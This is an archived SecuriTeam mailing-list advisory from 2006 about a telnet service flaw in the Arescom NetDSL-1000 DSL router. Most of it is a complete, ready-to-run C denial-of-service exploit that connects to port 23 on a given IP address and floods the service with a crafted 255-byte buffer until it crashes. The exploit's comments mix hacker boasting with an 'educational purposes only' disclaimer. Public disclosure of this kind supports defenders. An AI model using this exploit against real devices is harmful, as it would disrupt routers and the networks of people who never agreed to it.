[EXPL] Arescom NetDSL-1000 TelnetD DoS (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Feb 2006 17:28:56 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Arescom NetDSL-1000 TelnetD DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
"The <http://www.arescom.com/> Arescom NetDSL-1000 series of DSL routers
is in common use by a number of DSL providers."
Arescom NetDSL-1000 leaves the telnet port open. Improper buffer handling
allows attackers to DoS the Router and crash the service.
DETAILS
Vulnerable Systems:
* Arescom NetDSL-1000
Exploit:
/*
Do you want to hack? les`t go .. free your mind
Tu veux etre un hacker? allez .. if faut libere ta tete!
Quieres hackear? dale .. libera tu mente
Vulnerabilidad en modem Arescom NetDSL-1000
por un buffer overflow debido < [255] en la pila stack.
DoS atack por Fabian Ramirez S. <framirez at akori.fr>
www.framirez.com
If you flood the telnet configuration a couple dozen times with
long
strings, eventually the telnetd service flat out dies. Routing
functions
of the NetDSL continue to work fine as before. It is unknown
whether only
the telnetd service is affected, other means of remote
configuration may
have become unavailable as well.
Remember: KING
Solo para fines educativos! (CREEEEEEO ZEEEEEEEEEEE)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 23
#define MAXDATASIZE 100
char shellcode[]= "\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1\xC0\xC1"
"\x89\x28\x12\x34\xC0\xC1\xC0\xC1\xC0\xC1";
int main(int argc, char *argv[])
{
int fd, numbytes,i;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in server;
printf("Exploit Arescom NetDSL-1000 executing\n");
printf (" by framirez\n");
if (argc !=2) {
printf("Uso: %s <Direcci n IP>\n",argv[0]);
exit(-1);
}
if ((he=gethostbyname(argv[1]))==NULL){
printf("gethostbyname() error\n");
exit(-1);
}
if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("socket() error\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
if(connect(fd, (struct sockaddr *)&server,
sizeof(struct sockaddr))==-1){
printf("ERROR conectando al host\n");
exit(-1);
}
for (i=0;i<3;i++)
{
send(fd,shellcode,255,0);
}
printf ("Exploit enviado con EXITO al destinatario\n");
printf (" by framirez\n");
close(fd);
return 1;
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:framirez@xxxxxxxx> Fabian
Ramirez S.
The advisory can be found at:
<http://www.securiteam.com/securitynews/5SP0G2A6AM.html>
http://www.securiteam.com/securitynews/5SP0G2A6AM.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [TOOL] The Offline NT Password Editor
- Next by Date: [TOOL] Reason - Nessus Client
- Previous by thread: [TOOL] The Offline NT Password Editor
- Next by thread: [TOOL] Reason - Nessus Client
- Index(es):
Relevant Pages
- [UNIX] Telnetd Allows Login as Arbitrary User
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Telnetd Allows Login as
Arbitrary User ... Exploitation of this vulnerability is trivial. ... (Securiteam) - [NT] Microsoft Excel Length Parameter Parsing Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Office XP Software
(Excel 2002) ... * Microsoft Office v. X for Mac ... (Securiteam) - [EXPL] Ipswitch WhatsUp Gold Remote Buffer Overflow Exploit
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... WhatsUp Gold Remote
Buffer Overflow Vulnerability, ... print $socket "Referer: ... (Securiteam) - [NT] Microsoft Windows NTFS Improper Handler Closing
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... from a system
shutdown, uninitialized data may be visible in files from ... (Securiteam) - [NEWS] Mac OS X Panther Screen Lock Bypass
... The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com ... tedious in actual practice
thus far. ... For the first time user actually executing anything ... (Securiteam)
